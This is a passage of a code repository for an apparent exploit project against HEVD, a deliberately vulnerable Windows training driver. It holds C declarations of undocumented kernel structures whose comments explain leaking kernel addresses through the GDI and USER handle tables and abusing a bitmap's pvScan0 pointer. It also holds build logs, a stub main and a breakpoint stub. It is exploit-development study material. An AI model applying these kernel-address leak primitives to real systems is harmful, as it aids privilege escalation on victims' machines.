} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
37 |
/*
 * Output of NtQueryInformationProcess(ProcessBasicInformation).
 * ExitStatus is an NTSTATUS (declared LONG here).  PebBaseAddress is the
 * user-mode PEB of the queried process — presumably the route this project
 * takes to PEB.GdiSharedHandleTable.  The process ids are ULONG_PTR, so the
 * structure is 24 bytes on x86 and 48 on x64.
 */
typedef struct _PROCESS_BASIC_INFORMATION
{
    LONG ExitStatus;
    PVOID PebBaseAddress;
    ULONG_PTR AffinityMask;
    LONG BasePriority;
    ULONG_PTR UniqueProcessId;
    ULONG_PTR ParentProcessId;
} PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;
47 |
/*
 * Partial, hand-transcribed Process Environment Block.  The layout stops
 * at GdiSharedHandleTable, which is presumably the only field this project
 * needs (it is the base of the GDICELL table declared below).
 *
 * NOTE(review): every field before GdiSharedHandleTable exists only to
 * make that member land at the right offset.  PEB layout is specific to
 * the OS build and to bitness; the unions and bit-fields here are
 * transcribed from one version and have not been verified against every
 * target — compare with `dt nt!_PEB` under the kernel debugger before
 * trusting the offset on a new build.
 */
typedef struct _PEB {
    BOOLEAN InheritedAddressSpace;
    BOOLEAN ReadImageFileExecOptions;
    BOOLEAN BeingDebugged;
    union
    {
        BOOLEAN BitField;
        struct
        {
            BOOLEAN ImageUsesLargePages : 1;
            BOOLEAN IsProtectedProcess : 1;
            BOOLEAN IsLegacyProcess : 1;
            BOOLEAN IsImageDynamicallyRelocated : 1;
            BOOLEAN SkipPatchingUser32Forwarders : 1;
            BOOLEAN SpareBits : 3;
        };
    };
    HANDLE Mutant;

    PVOID ImageBaseAddress;
    PVOID Ldr;
    PVOID ProcessParameters;
    PVOID SubSystemData;
    PVOID ProcessHeap;
    PRTL_CRITICAL_SECTION FastPebLock;
    PVOID AtlThunkSListPtr;
    PVOID IFEOKey;
    union
    {
        ULONG CrossProcessFlags;
        struct
        {
            ULONG ProcessInJob : 1;
            ULONG ProcessInitializing : 1;
            ULONG ProcessUsingVEH : 1;
            ULONG ProcessUsingVCH : 1;
            ULONG ProcessUsingFTH : 1;
            ULONG ReservedBits0 : 27;
        };
        ULONG EnvironmentUpdateCount;
    };
    union
    {
        PVOID KernelCallbackTable;
        PVOID UserSharedInfoPtr;
    };
    ULONG SystemReserved[1];
    ULONG AtlThunkSListPtr32;
    PVOID ApiSetMap;
    ULONG TlsExpansionCounter;
    PVOID TlsBitmap;
    ULONG TlsBitmapBits[2];
    PVOID ReadOnlySharedMemoryBase;
    PVOID HotpatchInformation;
    PVOID *ReadOnlyStaticServerData;
    PVOID AnsiCodePageData;
    PVOID OemCodePageData;
    PVOID UnicodeCaseTableData;

    ULONG NumberOfProcessors;
    ULONG NtGlobalFlag;

    LARGE_INTEGER CriticalSectionTimeout;
    SIZE_T HeapSegmentReserve;
    SIZE_T HeapSegmentCommit;
    SIZE_T HeapDeCommitTotalFreeThreshold;
    SIZE_T HeapDeCommitFreeBlockThreshold;

    ULONG NumberOfHeaps;
    ULONG MaximumNumberOfHeaps;
    PVOID *ProcessHeaps;

    /* Base of the GDI shared handle table: an array of GDICELL entries,
     * one per GDI handle, mapped read-only into every GUI process. */
    PVOID GdiSharedHandleTable;
} PEB, *PPEB;
123 |
/*
 * One entry of the GDI shared handle table (presumably indexed from
 * PEB.GdiSharedHandleTable by the low 16 bits of a GDI handle).
 * pKernelAddress is the kernel-mode object behind the handle, which is
 * what makes this user-readable table a kernel-address disclosure; the
 * matching user-mode pointer, if any, is pUserAddress.  The entry is two
 * pointers plus four USHORTs: 16 bytes on x86, 24 bytes on x64.
 * NOTE(review): the handle-table layout is version specific; verify the
 * field order on the target build before computing offsets from it.
 */
typedef struct _GDICELL {
    LPVOID pKernelAddress;
    USHORT wProcessId;
    USHORT wCount;
    USHORT wUpper;
    USHORT wType;
    LPVOID pUserAddress;
} GDICELL, *PGDICELL;
132 |
/*
 * Leading fields of the win32k SERVERINFO block that SHAREDINFO.psi points
 * at.  Only the prefix is declared; cHandleEntries is the count of
 * USER_HANDLE_ENTRY slots in SHAREDINFO.aheList and should bound any walk
 * of that table.  The remaining members of the real structure are omitted,
 * so never allocate or copy a SERVERINFO by sizeof().
 */
typedef struct _SERVERINFO {
    DWORD dwSRVIFlags;
    DWORD cHandleEntries;
    WORD wSRVIFlags;
    WORD wRIPPID;
    WORD wRIPError;
} SERVERINFO, *PSERVERINFO;
140 |
/*
 * One slot of the USER (win32k) handle table reached through
 * SHAREDINFO.aheList.  pKernel is the kernel-mode object for the handle;
 * the union names the owner pointer under the three conventional names
 * (process info / thread info / process info) since which one applies
 * depends on `type`.  generation is the handle reuse counter.
 * NOTE(review): like GDICELL this is a user-readable table holding kernel
 * pointers; its layout is also build specific — confirm before use.
 */
typedef struct _USER_HANDLE_ENTRY {
    void *pKernel;
    union
    {
        PVOID pi;
        PVOID pti;
        PVOID ppi;
    };
    BYTE type;
    BYTE flags;
    WORD generation;
} USER_HANDLE_ENTRY, *PUSER_HANDLE_ENTRY;
153 |
/*
 * User-mode view of win32k's shared info block (the gSharedInfo export of
 * user32, presumably resolved with GetProcAddress elsewhere in this
 * project).  psi points at the SERVERINFO prefix above, aheList at the
 * USER_HANDLE_ENTRY array and HeEntrySize gives the stride of that array;
 * iterate with HeEntrySize rather than sizeof(USER_HANDLE_ENTRY) so a
 * different entry size on the target build does not misalign the walk.
 * The remaining ULONG_PTR members are padding for the real layout.
 */
typedef struct _SHAREDINFO {
    PSERVERINFO psi;
    PUSER_HANDLE_ENTRY aheList;
    ULONG HeEntrySize;
    ULONG_PTR pDispInfo;
    ULONG_PTR ulSharedDelts;
    ULONG_PTR awmControl;
    ULONG_PTR DefWindowMsgs;
    ULONG_PTR DefWindowSpecMsgs;
} SHAREDINFO, *PSHAREDINFO;
164 |
/*
 * Pairs a GDI bitmap handle with a leaked pointer to its pixel buffer
 * (pvScan0 of the kernel SURFOBJ, by the field name — presumably obtained
 * through the GDICELL.pKernelAddress of hBitmap plus a build-specific
 * offset).  pBitmapPvScan0 is a kernel address: it is only meaningful to
 * pass back to the kernel (e.g. via SetBitmapBits/GetBitmapBits on a
 * corrupted bitmap), never to dereference from user mode.
 */
typedef struct _LeakBitmapInfo {
    HBITMAP hBitmap;
    PUCHAR pBitmapPvScan0;
} LeakBitmapInfo, *pLeakBitmapInfo;
169 |
/*
 * Pointer type for ntdll!NtQuerySystemInformation, which is undocumented
 * and therefore resolved at run time rather than linked.  The usual
 * two-call pattern applies: call once with a small buffer, read the
 * required size back from ReturnLength, then call again; check the
 * returned NTSTATUS with NT_SUCCESS() rather than comparing to zero.
 */
typedef NTSTATUS(NTAPI *_NtQuerySystemInformation)(
    SYSTEM_INFORMATION_CLASS SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
    );
176 |
/*
 * Pointer type for ntdll!RtlGetVersion.  Unlike GetVersionEx it is not
 * subject to the application manifest / compatibility-shim version lie,
 * so it is the reliable way to select per-OS-build offsets.  The caller
 * must set lpVersionInformation->dwOSVersionInfoSize before the call.
 */
typedef NTSTATUS(NTAPI *_RtlGetVersion)(
    LPOSVERSIONINFOEXW lpVersionInformation
    );
180 |
/*
 * Pointer type for ntdll!NtQueryInformationProcess.  The information class
 * is declared DWORD instead of PROCESSINFOCLASS; both are 32-bit so the ABI
 * is unaffected.  With class 0 (ProcessBasicInformation) the output is the
 * PROCESS_BASIC_INFORMATION declared above, which is presumably how the
 * PEB address is obtained.
 */
typedef NTSTATUS (WINAPI *_NtQueryInformationProcess)(
    HANDLE ProcessHandle,
    DWORD ProcessInformationClass,
    PVOID ProcessInformation,
    DWORD ProcessInformationLength,
    PDWORD ReturnLength
    );
188 |
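/*
 * Function type for ntdll!NtAllocateVirtualMemory, resolved at run time
 * and called through a NtAllocateVirtualMemory_t *.
 *
 *   ProcessHandle   target process.
 *   BaseAddress     in: requested base (NULL = any); out: actual base.
 *   ZeroBits        number of high-order address bits that must be zero.
 *   AllocationSize  in: requested byte count; out: size as rounded by the
 *                   kernel.  (Named RegionSize in the native prototype.)
 *   AllocationType  MEM_COMMIT / MEM_RESERVE flags.
 *   Protect         PAGE_* protection for the region.
 *
 * Fix: AllocationSize was declared PULONG and ZeroBits ULONG.  The native
 * prototype uses PSIZE_T and ULONG_PTR.  The kernel writes a pointer-sized
 * value through RegionSize, so on x64 any caller that trusted the old
 * declaration and passed a 4-byte ULONG would have 4 bytes of adjacent
 * stack overwritten.  The x64 build log shows the caller already passes a
 * SIZE_T * (warning C4133 at HEVD_Stop_By_Win10.c(671)); this declaration
 * now matches that call and the real ABI.  On x86 SIZE_T and ULONG are the
 * same width, so the 32-bit build is unchanged.
 */
typedef NTSTATUS WINAPI NtAllocateVirtualMemory_t(IN HANDLE ProcessHandle,
                                                   IN OUT PVOID *BaseAddress,
                                                   IN ULONG_PTR ZeroBits,
                                                   IN OUT PSIZE_T AllocationSize,
                                                   IN ULONG AllocationType,
                                                   IN ULONG Protect);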
195 |
196 |
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/CL.read.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/CL.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/HEVD_Stop_By_Win10.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/HEVD_Stop_By_Win10.obj
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/Stop_by_win10.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | C:\USERS\SH1\DOCUMENTS\VISUAL STUDIO 2010\PROJECTS\STOP_BY_WIN8\RELEASE\STOP_BY_WIN10.EXE
2 | C:\USERS\SH1\DOCUMENTS\VISUAL STUDIO 2010\PROJECTS\STOP_BY_WIN8\RELEASE\STOP_BY_WIN10.PDB
3 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Stop_by_win10\Release\cl.command.1.tlog
4 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Stop_by_win10\Release\CL.read.1.tlog
5 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Stop_by_win10\Release\CL.write.1.tlog
6 | C:\USERS\SH1\DOCUMENTS\VISUAL STUDIO 2010\PROJECTS\STOP_BY_WIN8\STOP_BY_WIN10\RELEASE\HEVD_STOP_BY_WIN10.OBJ
7 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Stop_by_win10\Release\link.command.1.tlog
8 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Stop_by_win10\Release\link.read.1.tlog
9 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Stop_by_win10\Release\link.write.1.tlog
10 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Stop_by_win10\Release\mt.command.1.tlog
11 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Stop_by_win10\Release\mt.read.1.tlog
12 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Stop_by_win10\Release\mt.write.1.tlog
13 | C:\USERS\SH1\DOCUMENTS\VISUAL STUDIO 2010\PROJECTS\STOP_BY_WIN8\STOP_BY_WIN10\RELEASE\STOP_BY_WIN10.EXE.INTERMEDIATE.MANIFEST
14 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Stop_by_win10\Release\Stop_by_win10.write.1.tlog
15 | C:\USERS\SH1\DOCUMENTS\VISUAL STUDIO 2010\PROJECTS\STOP_BY_WIN8\STOP_BY_WIN10\RELEASE\VC100.PDB
16 |
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/Stop_by_win10.lastbuildstate:
--------------------------------------------------------------------------------
1 | #v4.0:v100
2 | Release|Win32|C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\|
3 |
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/Stop_by_win10.log:
--------------------------------------------------------------------------------
1 | Build started 2/24/2017 6:32:30 AM.
2 | Project "C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Stop_by_win10\Stop_by_win10.vcxproj" on node 2 (rebuild target(s)).
3 | _PrepareForClean:
4 | Deleting file "Release\Stop_by_win10.lastbuildstate".
5 | InitializeBuildStatus:
6 | Creating "Release\Stop_by_win10.unsuccessfulbuild" because "AlwaysCreate" was specified.
7 | ClCompile:
8 | C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\bin\CL.exe /c /Zi /nologo /W3 /WX- /O2 /Oi /Oy- /GL /D WIN32 /D NDEBUG /D _CONSOLE /D _UNICODE /D UNICODE /Gm- /EHsc /MD /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Fo"Release\\" /Fd"Release\vc100.pdb" /Gd /TC /analyze- /errorReport:prompt HEVD_Stop_By_Win10.c
9 | HEVD_Stop_By_Win10.c
10 | HEVD_Stop_By_Win10.c(52): warning C4013: 'NtGdiDdDDICreateAllocation' undefined; assuming extern returning int
11 | HEVD_Stop_By_Win10.c(346): warning C4047: 'initializing' : 'PVOID' differs in levels of indirection from 'int'
12 | HEVD_Stop_By_Win10.c(652): warning C4244: '+=' : conversion from 'double' to 'long', possible loss of data
13 | HEVD_Stop_By_Win10.c(656): warning C4244: '+=' : conversion from 'double' to 'long', possible loss of data
14 | HEVD_Stop_By_Win10.c(330): warning C4101: 'dwResult' : unreferenced local variable
15 | Link:
16 | C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\bin\link.exe /ERRORREPORT:PROMPT /OUT:"C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Release\Stop_by_win10.exe" /INCREMENTAL:NO /NOLOGO kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /MANIFEST /ManifestFile:"Release\Stop_by_win10.exe.intermediate.manifest" /MANIFESTUAC:"level='asInvoker' uiAccess='false'" /DEBUG /PDB:"C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Release\Stop_by_win10.pdb" /SUBSYSTEM:CONSOLE /OPT:REF /OPT:ICF /LTCG /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:"C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Release\Stop_by_win10.lib" /MACHINE:X86 Release\HEVD_Stop_By_Win10.obj
17 | HEVD_Stop_By_Win10.obj : error LNK2001: unresolved external symbol _NtGdiDdDDICreateAllocation
18 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Release\Stop_by_win10.exe : fatal error LNK1120: 1 unresolved externals
19 | C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\Platforms\Win32\Microsoft.Cpp.Win32.Targets(268,5): error MSB6006: "link.exe" exited with code 1120.
20 | Done Building Project "C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win8\Stop_by_win10\Stop_by_win10.vcxproj" (rebuild target(s)) -- FAILED.
21 |
22 | Build FAILED.
23 |
24 | Time Elapsed 00:00:02.07
25 |
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/Stop_by_win10.unsuccessfulbuild:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/Stop_by_win10.unsuccessfulbuild
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/Stop_by_win10.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/Stop_by_win10.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/cl.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/cl.command.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/link.command.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/link.read.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/link.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/vc100.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Release/vc100.pdb
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Stop_By_Win10.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 |
6 |
/*
 * Placeholder entry point: writes a tab-indented "[+] " prefix to stdout
 * (no trailing newline) and exits with status 0.  Command-line arguments
 * are accepted but not used.
 */
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;

    fputs("\t\t[+] ", stdout);
    return 0;
}
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Stop_by_win10.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Debug
10 | x64
11 |
12 |
13 | Release
14 | Win32
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {680F7C84-6509-4642-93B3-FE631C50EA12}
23 | Win32Proj
24 | Stop_by_win10
25 |
26 |
27 |
28 | Application
29 | true
30 | Unicode
31 |
32 |
33 | Application
34 | true
35 | Unicode
36 |
37 |
38 | Application
39 | false
40 | true
41 | Unicode
42 |
43 |
44 | Application
45 | false
46 | true
47 | Unicode
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 | true
67 |
68 |
69 | true
70 |
71 |
72 | false
73 |
74 |
75 | false
76 |
77 |
78 |
79 |
80 |
81 | Level3
82 | Disabled
83 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
84 |
85 |
86 | Console
87 | true
88 |
89 |
90 |
91 |
92 |
93 |
94 | Level3
95 | Disabled
96 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
97 |
98 |
99 | Console
100 | true
101 |
102 |
103 |
104 |
105 | Level3
106 |
107 |
108 | MaxSpeed
109 | true
110 | true
111 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
112 |
113 |
114 | Console
115 | true
116 | true
117 | true
118 |
119 |
120 |
121 |
122 | Level3
123 |
124 |
125 | MaxSpeed
126 | true
127 | true
128 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
129 |
130 |
131 | Console
132 | true
133 | true
134 | true
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 | Document
146 | ml64 /c %(filename).asm
147 | %(filename).obj
148 |
149 |
150 |
151 |
152 |
153 |
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Stop_by_win10.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Source Files
30 |
31 |
32 |
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/Stop_by_win10.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/_debugbreak.asm:
--------------------------------------------------------------------------------
; Int_3 - raise a software breakpoint (INT 3) from C code.
;
; The x64 MSVC compiler has no inline assembler, so the instruction lives
; in this separate MASM module; the project assembles it with "ml64 /c"
; (custom build step in the .vcxproj) and links _debugbreak.obj.  The C
; side calls it as Int_3() - the x64 build log reports warning C4013
; ("Int_3 undefined") because the extern "C" void Int_3(); declaration in
; HEVD_Stop_By_Win10.h is commented out; re-enable it to get a prototype.
;
; Behaviour: with a debugger attached, INT 3 stops execution there.  Without
; one, a user-mode INT 3 becomes an unhandled EXCEPTION_BREAKPOINT and the
; process is terminated, so this is a debugging aid for a VM under a kernel
; debugger, not something to leave in a release build.  __debugbreak() from
; <intrin.h> would likely serve the same purpose without a separate object.
.CODE

Int_3 PROC
; trap to the attached debugger; execution resumes at the ret
int 3
ret
Int_3 ENDP

END
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/_debugbreak.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/_debugbreak.obj
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/CL.read.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/CL.write.1.tlog
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/HEVD_Stop_By_Win10.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k0keoyo/try_exploit/26c47d9c1f8adb35c655e708def1a0f08251dd15/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/HEVD_Stop_By_Win10.obj
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/Stop_by_win10.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | C:\USERS\SH1\DOCUMENTS\VISUAL STUDIO 2010\PROJECTS\STOP_BY_WIN10\STOP_BY_WIN10\_DEBUGBREAK.OBJ
2 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\cl.command.1.tlog
3 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\CL.read.1.tlog
4 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\CL.write.1.tlog
5 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\custombuild.command.1.tlog
6 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\custombuild.read.1.tlog
7 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\custombuild.write.1.tlog
8 | C:\USERS\SH1\DOCUMENTS\VISUAL STUDIO 2010\PROJECTS\STOP_BY_WIN10\STOP_BY_WIN10\X64\RELEASE\HEVD_STOP_BY_WIN10.OBJ
9 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\link.command.1.tlog
10 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\link.read.1.tlog
11 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\link.write.1.tlog
12 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\mt.command.1.tlog
13 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\mt.read.1.tlog
14 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\mt.write.1.tlog
15 | C:\USERS\SH1\DOCUMENTS\VISUAL STUDIO 2010\PROJECTS\STOP_BY_WIN10\STOP_BY_WIN10\X64\RELEASE\STOP_BY_WIN10.EXE.INTERMEDIATE.MANIFEST
16 | C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\x64\Release\Stop_by_win10.write.1.tlog
17 | C:\USERS\SH1\DOCUMENTS\VISUAL STUDIO 2010\PROJECTS\STOP_BY_WIN10\STOP_BY_WIN10\X64\RELEASE\VC100.PDB
18 | C:\USERS\SH1\DOCUMENTS\VISUAL STUDIO 2010\PROJECTS\STOP_BY_WIN10\X64\RELEASE\STOP_BY_WIN10.EXE
19 | C:\USERS\SH1\DOCUMENTS\VISUAL STUDIO 2010\PROJECTS\STOP_BY_WIN10\X64\RELEASE\STOP_BY_WIN10.PDB
20 |
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/Stop_by_win10.exe.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/Stop_by_win10.lastbuildstate:
--------------------------------------------------------------------------------
1 | #v4.0:v100
2 | Release|x64|C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\|
3 |
--------------------------------------------------------------------------------
/HEVD_Win10&Win8/Stop_by_win8/Stop_by_win10/x64/Release/Stop_by_win10.log:
--------------------------------------------------------------------------------
1 | Build started 2/23/2017 10:23:17 AM.
2 | Project "C:\Users\sh1\Documents\Visual Studio 2010\Projects\Stop_by_win10\Stop_by_win10\Stop_by_win10.vcxproj" on node 2 (rebuild target(s)).
3 | _PrepareForClean:
4 | Deleting file "x64\Release\Stop_by_win10.lastbuildstate".
5 | InitializeBuildStatus:
6 | Creating "x64\Release\Stop_by_win10.unsuccessfulbuild" because "AlwaysCreate" was specified.
7 | CustomBuild:
8 | Performing Custom Build Tools
9 | Assembling: _debugbreak.asm
10 | Microsoft (R) Macro Assembler (x64) Version 10.00.30319.01
11 | Copyright (C) Microsoft Corporation. All rights reserved.
12 |
13 | ClCompile:
14 | C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\bin\x86_amd64\CL.exe /c /Zi /nologo /W3 /WX- /O2 /Oi /GL /D WIN32 /D NDEBUG /D _CONSOLE /D _UNICODE /D UNICODE /Gm- /EHsc /MD /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Fo"x64\Release\\" /Fd"x64\Release\vc100.pdb" /Gd /TC /errorReport:prompt HEVD_Stop_By_Win10.c
15 | HEVD_Stop_By_Win10.c
16 | HEVD_Stop_By_Win10.c(57): warning C4013: 'Int_3' undefined; assuming extern returning int
17 | HEVD_Stop_By_Win10.c(58): warning C4022: 'VirtualAlloc' : pointer mismatch for actual parameter 1
18 | HEVD_Stop_By_Win10.c(349): warning C4047: 'initializing' : 'PVOID' differs in levels of indirection from '__int64'
19 | HEVD_Stop_By_Win10.c(350): warning C4047: 'initializing' : 'PVOID' differs in levels of indirection from '__int64'
